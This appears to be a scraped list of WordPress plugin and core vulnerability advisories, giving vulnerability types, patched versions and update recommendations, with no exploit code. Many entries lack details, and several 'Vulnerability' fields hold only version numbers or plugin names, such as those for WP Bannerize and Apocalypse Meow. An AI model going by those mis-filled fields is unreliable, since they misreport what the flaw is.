Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Missing Authorization
Patched Version: 0.9.95
Recommended Action: Update to version 0.9.95, or a newer patched version

Plugin: Popup Maker and Popup Anything – Popup for opt-ins and Lead Generation Conversions

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Stream Video Player

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization in ‘wpfc_clear_cache_of_allsites_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: Sidebar Widgets by CodeLights

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leyka

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.30.2
Recommended Action: Update to version 3.30.2, or a newer patched version

Plugin: WP Bannerize

Vulnerability: 4.0.2
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ClimateClick: Climate Action for all

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9.22
Recommended Action: Update to version 1.0.9.22, or a newer patched version

Plugin: Tickera – WordPress Event Ticketing

Vulnerability: Cross-Site Request Forgery to Ticket Post Status Change
Patched Version: 3.5.1.1
Recommended Action: Update to version 3.5.1.1, or a newer patched version

Plugin: Revive Social – Social Media Auto Post and Scheduling Automation Plugin

Vulnerability: Authorization Bypass
Patched Version: 8.0.0
Recommended Action: Update to version 8.0.0, or a newer patched version

Plugin: Qi Addons For Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Cross-Site Scripting
Patched Version: 6.23.0
Recommended Action: Update to version 6.23.0, or a newer patched version

Plugin: SEO SearchTerms Tagging 2

Plugin: String locator

Vulnerability: Authenticated Arbitrary File Read
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Newsletters

Vulnerability: Cross-Site Scripting via contentarea Parameter
Patched Version: 4.6.19
Recommended Action: Update to version 4.6.19, or a newer patched version

Plugin: OAuth Client by DigitialPixies

Plugin: Stripe Payment Plugin for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.82
Recommended Action: Update to version 2.82, or a newer patched version

Plugin: uncode-core

Vulnerability: Privilege Escalation
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: Japanized For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection due to Double Prepare approach
Patched Version: 3.7.23
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.23, 3.8.23, 3.9.21, 4.0.20, 4.1.20, 4.2.17, 4.3.13, 4.4.12, 4.5.11, 4.6.8, 4.7.7, 4.8.3

Plugin: User Control

Plugin: anti-plagiarism

Plugin: GamiPress – Youtube integration

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Simple Single Sign On

Vulnerability: Insecure OAuth Implementation to Authentication Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Activity Log

Vulnerability: Unauthenticated Data Export to Sensitive Information Disclosure
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: WP-Download

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: GB Gallery Slideshow

Vulnerability: SQL Injection
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Soundy Audio Playlist

Plugin: Visibility Logic for Elementor

Vulnerability: Cross-Site Request Forgery via toggle_option
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Alpine PhotoTile for Pinterest

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.5.75
Recommended Action: Update to version 5.5.75, or a newer patched version

Plugin: Hostel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.5.2
Recommended Action: Update to version 1.1.5.2, or a newer patched version

Plugin: Opening Hours

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Embed Discovery
Patched Version: 4.1.38
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.38, 4.2.35, 4.3.31, 4.4.30, 4.5.29, 4.6.26, 4.7.26, 4.8.22, 4.9.23, 5.0.19, 5.1.16, 5.2.18, 5.3.15, 5.4.13, 5.5.12, 5.6.11, 5.7.9, 5.8.7, 5.9.6, 6.0.4, 6.1.2, 6.2.1

Plugin: Search Exclude

Vulnerability: Arbitrary Settings Change
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Apocalypse Meow

Vulnerability: 21.2.7
Patched Version: 21.2.8
Recommended Action: Update to version 21.2.8, or a newer patched version

Plugin: EventON

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: Contact Form 7 <= 1.3.6.2
Patched Version: 1.3.6.3
Recommended Action: Update to version 1.3.6.3, or a newer patched version

Plugin: Simplified Content

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Contact Form Generator : Creative form builder for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: ImageMapper

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via imgmap_save_area_title
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Symposium

Vulnerability: SQL Injection
Patched Version: 15.4
Recommended Action: Update to version 15.4, or a newer patched version

Plugin: Secure Copy Content Protection and Content Locking

Vulnerability: SQL Injection
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 13.1.5
Recommended Action: Update to version 13.1.5, or a newer patched version

Plugin: StageShow

Vulnerability: Open Redirect
Patched Version: 5.0.9
Recommended Action: Update to version 5.0.9, or a newer patched version

Plugin: WP Content Copy Protection

Vulnerability: Cross-Site Request Forgery to Setting Update
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Out-of-the-Box

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.20.3
Recommended Action: Update to version 1.20.3, or a newer patched version

Plugin: WPML

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Bulk Edit Post Titles

Plugin: qTranslate X Cleanup and WPML Import

Vulnerability: Missing Authorization via clean_ajx
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal via Customizer
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: Email Before Download

Vulnerability: SQL Injection
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Sensitive Information Disclosure via Shortcode
Patched Version: 3.9.1
Recommended Action: Update to version 3.9.1, or a newer patched version

Plugin: Countdown and CountUp, WooCommerce Sales Timer

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Breeze – WordPress Cache Plugin

Vulnerability: Unprotected AJAX Actions
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Missing Authorization to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Visual Website Collaboration, Feedback & Project Management – Atarim

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.4
Recommended Action: Update to version 3.9.4, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated Unrestricted File Upload
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WordPress Social Login

Plugin: 코드엠샵 마이사이트 – MSHOP MY SITE

Vulnerability: Missing Authorization via update_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Royal Elementor Addons and Templates

Vulnerability: Missing Authorization to Subscriber+ Arbitrary Post Creation
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Plugin: QR Redirector

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: ShiftController Employee Shift Scheduling

Vulnerability: Unauthenticated Stored Cross-Site Scripting via ‘hc-title’
Patched Version: 4.9.24
Recommended Action: Update to version 4.9.24, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz 7.0
Patched Version: 7.0.5
Recommended Action: Update to version 7.0.5, or a newer patched version

Plugin: WP iCal Availability

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Missing Authorization to Arbitrary Custom Drop-Down Currency Switcher Deletion
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Classified Listing Pro – Classified ads & Business Directory Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.20
Recommended Action: Update to version 2.0.20, or a newer patched version

Plugin: zeenshare

Plugin: WP-Polls

Vulnerability: IP Validation Bypass
Patched Version: 2.76.0
Recommended Action: Update to version 2.76.0, or a newer patched version

Plugin: Daily Inspiration Generator

Plugin: Rezgo Online Booking

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Plainview Protect Passwords

Plugin: MapPress Maps for WordPress

Vulnerability: Authenticated Map Creation/Deletion to Stored Cross-Site Scripting & Remote Code Execution
Patched Version: 2.53.9
Recommended Action: Update to version 2.53.9, or a newer patched version

Plugin: mpOperationLogs

Plugin: Donation Thermometer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 12.6.6.1
Recommended Action: Update to version 12.6.6.1, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: SQL Injection
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.7.34
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, 4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, 5.3.4, 5.4.2

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.13.55
Recommended Action: Update to version 7.13.55, or a newer patched version

Plugin: Chameleon

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Theme per user

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Narnoo Distributor

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.7.3
Recommended Action: Update to version 3.2.7.3, or a newer patched version

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Google Maps CP

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Feedback Form Submission
Patched Version: 1.0.44
Recommended Action: Update to version 1.0.44, or a newer patched version

Plugin: jQuery Tagline Rotator

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 9.7.7
Recommended Action: Update to version 9.7.7, or a newer patched version

Plugin: WP Pipes

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Image Social Feed Plugin

Plugin: WooCommerce Dynamic Pricing and Discounts

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Ajax BootModal Login

Vulnerability: CAPTCHA Reuse
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FV Flowplayer Video Player

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 7.3.14.727
Recommended Action: Update to version 7.3.14.727, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via browser
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Feedweb

Vulnerability: SQL Injection
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WP Private Content Plus

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 5.8
Recommended Action: Update to version 5.8, or a newer patched version

Plugin: firestats

Vulnerability: SQL Injection
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_delete_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Integrate Google Drive

Vulnerability: Open Redirect via state
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: job-portal

Plugin: Back Button Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 12.0.5
Recommended Action: Update to version 12.0.5, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.9.9.2.9
Recommended Action: Update to version 2.9.9.2.9, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Admin+ Stored Cross-Site Scripting via breadcrumbs
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: User Activity Log Pro

Vulnerability: Unauthenticated Stored Cross-Site Scripting via User-Agent header
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Uncanny Automator – Easy Automation, Integration, Webhooks & Workflow Builder Plugin

Vulnerability: Cross-Site Request Forgery via update_automator_connect
Patched Version: 4.15
Recommended Action: Update to version 4.15, or a newer patched version

Plugin: wp-championship

Vulnerability: Multiple Cross-Site Request Forgery Vulnerabilities
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: Floating Social Bar

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Transposh WordPress Translation

Plugin: Wow Countdowns – easily create any countdowns, counters and timers

Plugin: Easy Smooth Scroll Links

Plugin: Easy Video Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2.11
Recommended Action: Update to version 1.2.2.11, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.12.8
Recommended Action: Update to version 1.12.8, or a newer patched version

Plugin: Better Search Replace

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WP Mapa Politico España

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Simple Link Directory

Vulnerability: PHP Object Injection
Patched Version: 5.7.0
Recommended Action: Update to version 5.7.0, or a newer patched version

Plugin: Word Replacer Pro

Plugin: Add Link to Facebook

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: SQL Injection
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: WP Video Lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.13
Recommended Action: Update to version 2.1.13, or a newer patched version

Plugin: WP DoNotTrack

Plugin: All in One B2B for WooCommerce

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 4.8.7
Recommended Action: Update to version 4.8.7, or a newer patched version

Plugin: enigma-chartjs

Vulnerability: Authenticated(Editor+) Stored Cross-Site Scripting via chart
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WS Form LITE – Drag & Drop Contact Form Builder for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.176
Recommended Action: Update to version 1.8.176, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Staff Member Stored Cross-Site Scripting
Patched Version: 20.3.1
Recommended Action: Update to version 20.3.1, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: All Video Gallery Plugin for WordPress

Vulnerability: SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: Hungred Post Thumbnail

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting in General Module
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: 10WebFAQ

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.17
Recommended Action: Update to version 1.0.17, or a newer patched version

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated (admin+) Stored Cross-Site Scripting
Patched Version: 2.1.1.3
Recommended Action: Update to version 2.1.1.3, or a newer patched version

Plugin: Amazon Product in a Post Plugin

Vulnerability: SQL Injection
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Simple Event Planner

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Yet Another Related Posts Plugin <= 5.30.2
Patched Version: 5.30.3
Recommended Action: Update to version 5.30.3, or a newer patched version

Plugin: Markdown on Save Improved

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.6
Recommended Action: Update to version 3.8.6, or a newer patched version

Plugin: Compact WP Audio Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.9.8
Recommended Action: Update to version 1.9.8, or a newer patched version

Plugin: WordPress REST API Authentication

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: All In One Slider

Plugin: Mihdan: Public Post Preview

Vulnerability: Missing Authorization
Patched Version: 1.9.10
Recommended Action: Update to version 1.9.10, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: CSV Injection
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: WP Editor.md – The Perfect WordPress Markdown Editor

Vulnerability: Cross-Site Scripting
Patched Version: 10.0.4
Recommended Action: Update to version 10.0.4, or a newer patched version

Plugin: Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.27
Recommended Action: Update to version 1.2.27, or a newer patched version

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.11.0.2
Recommended Action: Update to version 4.11.0.2, or a newer patched version

Plugin: Flo Forms – Easy Drag & Drop Form Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.41
Recommended Action: Update to version 1.0.41, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Amelia < 1.0.47
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: Comment Engine Pro

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail carousel slider

Vulnerability: Cross-Site Request Forgery to Mass Slider Deletion
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: About Rentals

Plugin: Welcart e-Commerce

Vulnerability: Information Disclosure via Arbitrary File Read
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: QR Code Tag

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: CampTix Event Ticketing

Vulnerability: Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WooCommerce Dropshipping Premium

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: WP Open Social

Plugin: gSlideShow

Plugin: BCS BatchLine Book Importer

Vulnerability: Arbitrary Product Import/Update
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Menubar

Vulnerability: Cross-Site Request Forgery in wpm-admin.php
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: flog

Plugin: Wordable – Export Google Docs to WordPress

Vulnerability: Authentication Bypass
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Split Test For Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Autoptimize

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: Microsoft Advertising Universal Event Tracking (UET)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Rara One Click Demo Import

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: SpeakOut! Email Petitions

Vulnerability: Cross-Site Scripting
Patched Version: 2.13.3
Recommended Action: Update to version 2.13.3, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: GigPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: bib2html

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.8.7, 1.9.10, 2.0.5, 2.1.11, 2.2.9, 2.3.7

Plugin: WP Accurate Form Data

Plugin: Welcart e-Commerce

Vulnerability: SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: About Me 3000 widget

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Multiple Protection Mechanism Bypasses
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Terillion Reviews

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Buzzsprout Podcasting

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 4.6.15
Recommended Action: Update to version 4.6.15, or a newer patched version

Plugin: Quick Page/Post Redirect Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Simple Mobile URL Redirect

Vulnerability: Cross-Site Request Forgery leading to Mobile Redirect Updates
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Cross-Site Request Forgery via qc_wp_latest_update_check
Patched Version: 4.7.9
Recommended Action: Update to version 4.7.9, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Arbitary File Upload
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

